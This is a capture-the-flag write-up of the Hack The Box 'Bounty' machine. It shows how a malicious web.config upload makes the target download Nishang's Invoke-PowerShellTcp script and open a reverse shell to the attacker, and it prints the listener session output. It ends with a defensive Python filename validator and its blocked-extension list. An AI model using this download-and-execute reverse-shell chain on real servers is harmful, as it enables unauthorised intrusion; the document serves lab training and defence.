File Upload


Now that I have confirmed code execution, I can move on to exploitation.

Uploading the payload

The target web server returns a 500 status code when I navigate to /uploadedfiles/web.config. Direct execution seems to be impossible; I tried many different types of payloads.

Jumping


SOLUTION

Since direct execution is not viable, “jumping” (a staged download-and-execute) is the appropriate approach:

  1. The victim connects to the attacker to download a malicious script/binary
  2. Upon download, the malicious script/binary executes and connects back to the attacker
  3. The attacker receives the shell

For this operation, I can use Nishang’s Invoke-PowerShellTcp.ps1 script to have the target system execute the code in memory.

I can do that by appending a call to the function at the bottom of the script, like so:

Invoke-PowerShellTcp -Reverse -IPAddress <LHOST> -Port <LPORT>

I then start a web server on Kali, hosting the PowerShell script above.

Uploading the updated payload intended for jumping

Upon sending a GET request to /uploadedfiles/web.config by refreshing the browser, the web server just hangs. This is likely because the system is executing the code.

┌──(kali㉿kali)-[~/archive/htb/labs/bounty]
└─$ simplehttp .
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.93 - - [09/Oct/2022 02:41:36] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

... and the web server hosting the PowerShell script logs a GET request for the script from the target IP address.

┌──(kali㉿kali)-[~/archive/htb/labs/bounty]
└─$ nnc 9998       
listening on [any] 9998 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.93] 49162
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
 
PS C:\windows\system32\inetsrv> whoami
bounty\merlin
PS C:\windows\system32\inetsrv> hostname
bounty
PS C:\windows\system32\inetsrv> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.93
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
 
Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

The Netcat listener that was waiting for a connection receives the shell, as the PowerShell script was executed in the target’s memory right after the download completed.

Initial Foothold as merlin via the web.config upload
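The root cause of this foothold is an upload handler that stored a client-supplied web.config inside a directory IIS serves. The following validator is an added example (not code from the writeup or from the Bounty box) showing the check such a handler should apply before writing a file: it assumes an extension allowlist and normalises the name the way Windows and IIS will interpret it, so web.config cannot slip through via case changes, trailing dots, path traversal, alternate data streams or double extensions.

```python
from pathlib import PureWindowsPath

# Names IIS treats as configuration, compared after normalisation (assumed list).
RESERVED_NAMES = {"web.config", "global.asax", "applicationhost.config"}
# Extensions that IIS handlers execute or that carry executable content (assumed list).
DENIED_EXTENSIONS = {".config", ".asp", ".aspx", ".ashx", ".asmx", ".asax", ".ascx",
                     ".cer", ".soap", ".ps1", ".exe", ".dll", ".bat", ".cmd"}
# What this hypothetical upload feature actually needs to accept.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".txt"}


def normalize_upload_name(raw: str) -> str:
    """Reduce a client-supplied filename to the name Windows would actually create."""
    # Keep only the final path component, so "..\\web.config" and
    # "uploads/../web.config" both become "web.config".
    name = PureWindowsPath(raw.replace("/", "\\")).name
    # Drop an NTFS alternate data stream suffix such as "::$DATA".
    name = name.split(":", 1)[0]
    # Windows strips trailing dots and spaces on file creation,
    # so "web.config." is written to disk as "web.config".
    name = name.rstrip(". ")
    return name.lower()


def is_safe_upload_name(raw: str) -> bool:
    """Return True only if the upload may be stored under a web-served directory."""
    if "\x00" in raw:
        return False
    name = normalize_upload_name(raw)
    if not name or name in RESERVED_NAMES:
        return False
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False  # no usable extension (e.g. "noext" or ".htaccess")
    # No segment may be a denied extension, so "shell.aspx.jpg" is rejected,
    # and the final extension must be on the allowlist.
    segments = {"." + p for p in parts[1:]}
    if segments & DENIED_EXTENSIONS:
        return False
    return "." + parts[-1] in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    for candidate in ["photo.png", "web.config", "Web.Config.", "..\\web.config",
                      "web.config::$DATA", "shell.aspx.jpg", "report.2022.pdf"]:
        print(f"{candidate!r}: {'accept' if is_safe_upload_name(candidate) else 'reject'}")
```

Storing uploads outside the web root, or in a directory where IIS has handler execution disabled, is the stronger fix; this name check is the defence-in-depth layer that catches the web.config case described above.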